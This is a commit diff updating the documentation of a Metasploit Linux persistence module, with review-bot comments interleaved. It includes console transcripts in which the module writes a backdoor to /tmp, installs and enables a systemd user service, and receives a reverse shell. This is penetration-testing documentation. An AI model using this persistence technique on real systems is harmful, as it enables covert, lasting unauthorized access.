Update module doc with my testing notes

William Vu
2019-03-06 00:47:12 -06:00
parent 31ba073009
commit a6782cbee4
@@ -5,9 +5,10 @@
1. Kali 2.0 (System V)
2. Ubuntu 14.04 (Upstart)
3. Ubuntu 16.04 (systemd)
4. Centos 5 (System V)
5. Fedora 18 (systemd)
6. Fedora 20 (systemd)
4. Ubuntu 16.04 (systemd user)
5. Centos 5 (System V)
6. Fedora 18 (systemd)
7. Fedora 20 (systemd)
## Verification Steps
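Review bot: The new entry `4. Ubuntu 16.04 (systemd user)` does not say how it differs from entry 3, `Ubuntu 16.04 (systemd)`. A short qualifier would help, for example that this case was tested from an unprivileged session (`uid=1000(vagrant)` in the transcript further down) and that the unit is written under the user's own directory, as shown by `/home/vagrant/.config/systemd/user/OzzdRBC.service`.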
@@ -253,16 +254,16 @@ Now with a multi handler, we can catch systemd restarting the process every 10se
[*] Starting the payload handler...
[*] Command shell session 8 opened (192.168.199.128:4444 -> 192.168.199.130:47056) at 2016-06-22 10:37:30 -0400
### systemd user
### systemd (Ubuntu 16.04 Server - vagrant)
msf5 exploit(linux/local/service_persistence) > show options
msf5 exploit(linux/local/service_persistence) > options
Module options (exploit/linux/local/service_persistence):
Name Current Setting Required Description
---- --------------- -------- -----------
SERVICE no Name of service to create
SESSION 1 yes The session to run this module on.
SESSION -1 yes The session to run this module on.
SHELLPATH /tmp yes Writable path to put our shell
SHELL_NAME no Name of shell file to write
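Review bot: The section title loses the word "user" if `### systemd (Ubuntu 16.04 Server - vagrant)` replaces `### systemd user` at the top of this hunk, while the tested-platform list calls this case `systemd user`. Suggest `### systemd user (Ubuntu 16.04 Server - vagrant)` so the heading and the list agree. The `SESSION -1` row also deserves a sentence on what `-1` selects, since the other value shown is an explicit session number.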
@@ -271,8 +272,8 @@ Now with a multi handler, we can catch systemd restarting the process every 10se
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 127.0.0.1 yes The listen address (an interface may be specified)
LPORT 4445 yes The listen port
LHOST 172.28.128.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
@@ -285,33 +286,20 @@ Now with a multi handler, we can catch systemd restarting the process every 10se
msf5 exploit(linux/local/service_persistence) > run
[!] SESSION may not be compatible with this module.
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want
ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4445
[*] Command shell session 2 opened (127.0.0.1:4445 -> 127.0.0.1:54344) at 2019-02-15 1
5:45:16 -0500
id
uid=1000(cblack) gid=1000(cblack) groups=1000(cblack),27(sudo),117(postgres)
exit
[*] 127.0.0.1 - Command shell session 2 closed.
msf5 exploit(linux/local/service_persistence) > set VERBOSE true
VERBOSE => true
msf5 exploit(linux/local/service_persistence) > run
[!] SESSION may not be compatible with this module.
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want
ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4445
[*] Writing backdoor to /tmp/iEucd
[*] Writing service: /home/cblack/.config/systemd/user/uKxHqmV.service
[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Writing backdoor to /tmp/PPpCF
[*] Max line length is 65537
[*] Writing 94 bytes in 1 chunks of 330 bytes (octal-encoded), using printf
[*] Creating user service directory
[*] Writing service: /home/vagrant/.config/systemd/user/OzzdRBC.service
[*] Max line length is 65537
[*] Writing 203 bytes in 1 chunks of 778 bytes (octal-encoded), using printf
[*] Reloading manager configuration
[*] Enabling service
[*] Starting service: uKxHqmV
[*] Command shell session 3 opened (127.0.0.1:4445 -> 127.0.0.1:54358) at 2019-02-15 1
5:45:30 -0500
[*] Starting service: OzzdRBC
[*] Command shell session 2 opened (172.28.128.1:4444 -> 172.28.128.3:52564) at 2019-03-06 00:22:40 -0600
echo hi lennart
hi lennart
exit
[*] 127.0.0.1 - Command shell session 3 closed.
id
uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant)
uname -a
Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
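Review bot: The transcript shows the step-by-step write messages (`Writing backdoor to /tmp/PPpCF`, `Writing service: /home/vagrant/.config/systemd/user/OzzdRBC.service`), but if the `set VERBOSE true` lines are among those removed in this hunk, nothing tells the reader how to obtain that output; keep the `set VERBOSE true` step ahead of `run`. The `[!] SESSION may not be compatible with this module.` warning is still shown without any explanation of whether it can be ignored here. A cleanup note would also help anyone reproducing this in a lab: the run leaves a payload in `/tmp` and an enabled unit under `/home/vagrant/.config/systemd/user/`, so the doc should say to disable the unit and remove both files afterwards.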